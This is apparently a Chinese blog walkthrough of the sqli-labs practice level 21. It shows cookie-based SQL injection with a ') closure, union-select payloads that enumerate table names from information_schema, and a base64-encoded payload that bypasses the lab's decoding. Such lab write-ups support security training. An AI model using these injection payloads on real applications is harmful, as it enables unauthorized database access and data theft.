sqli-labs(21)
2024-09-05 18:58:46
cookie注入 引号和括号闭合 base64编码
0X01
看了题目应该是 cookie注入 闭合是') 那么base64编码是什么鬼??
看源码解决吧
https://www.cnblogs.com/yuanwanli/p/5808472.html setcookie()函数的介绍
然后在查询比对与之前真确的时候输入的cookie是否符合
0X01构造语句进行注入
那我们的目的是将 输入的数据 通过base64解码后 变成(‘’)要填充的数据
所以直接把我们的语句先base64加密在放进去就行了 那我们来构造语句
http://tool.oschina.net/encrypt?type=3 在线编码的地址
‘) union select ,database(),#
但是好像失败了 对不是好像 是确实失败了
why?
在线url编码的工具
http://tool.chinaz.com/tools/urlencode.aspx
看这里 = 好像被url加密了 是不是我们的符号不能直接base?
尝试一下 验证一下
不是的 是我操作失误了
那我们继续回归正题
') union select 1,2,3#
这里知道 2,3 是显示位置
那我们的语句就可以从2,3下手了
这里直接演示一下爆表名
') union select 1,(select table_name from information_schema.tables where table_schema='security' limit 0,1),3#
JykgdW5pb24gc2VsZWN0IDEsKHNlbGVjdCB0YWJsZV9uYW1lIGZyb20gaW5mb3JtYXRpb25fc2NoZW1hLnRhYmxlcyB3aGVyZSB0YWJsZV9zY2hlbWE9J3NlY3VyaXR5JyBsaW1pdCAwLDEpLDMj
成功绕过
其他的构造方法就是以此类推 学到这里了 应该不需要多讲了 所以 我们 到此 over
切记 少就是多 慢就是快
最新文章
- Redis 安装,主从配置及Sentinel配置自动Failover
- 初入Cocos2d-x 2.2
- 通过Greasemonkey实现网页图片自动点击
- 明白python文件如何组织,理解建立源文件
- CentOS6.4下使用默认的PDF文档阅读器出现乱码的解决方案
- 重装mysql步骤
- 查找IP来源
- PAT (Advanced Level) 1044. Shopping in Mars (25)
- xampp打开显示缺少运行库的解决方法
- C# 大数组赋值给小数组,小数组赋值给大数组
- JAVA生成数字0~9字母A~Z混合编码0000、0001...0009、000A...000Z、0010......
- Java实现动态修改Jar包内文件内容
- Java的家庭记账本程序(H) :微信小程序 image 标签,在模拟器中无法显示图片?(已解决)
- Zabbix3.2监控Windows的内存使用百分比并在内存使用率超过85%的时候触发报警
- okhttp 的使用
- MSDN离线版 发现不少人都在找这个
- Django学习笔记之Queryset的高效使用
- 判断文本(text_to_be_present_in_element)
- Grunt实例
- Python——requests的安装及入门-贴吧爬虫
热门文章
- GITFLOW流程
- 树形DP水题系列(1):FAR-FarmCraft [POI2014][luogu P3574]
- 带EFI支持的GRUB2安装全记录
- python 元类 MetaClass
- 修改jar包package目录结构操作方法
- js 学习一 猜数字游戏
- varchar nvarchar 设计长度时 设计成 (2^n)-1 的好处
- install - 复制文件并设置属性
- Ubuntu 双网卡route
- Codeforces1203F2. Complete the Projects (hard version) (贪心+贪心+01背包)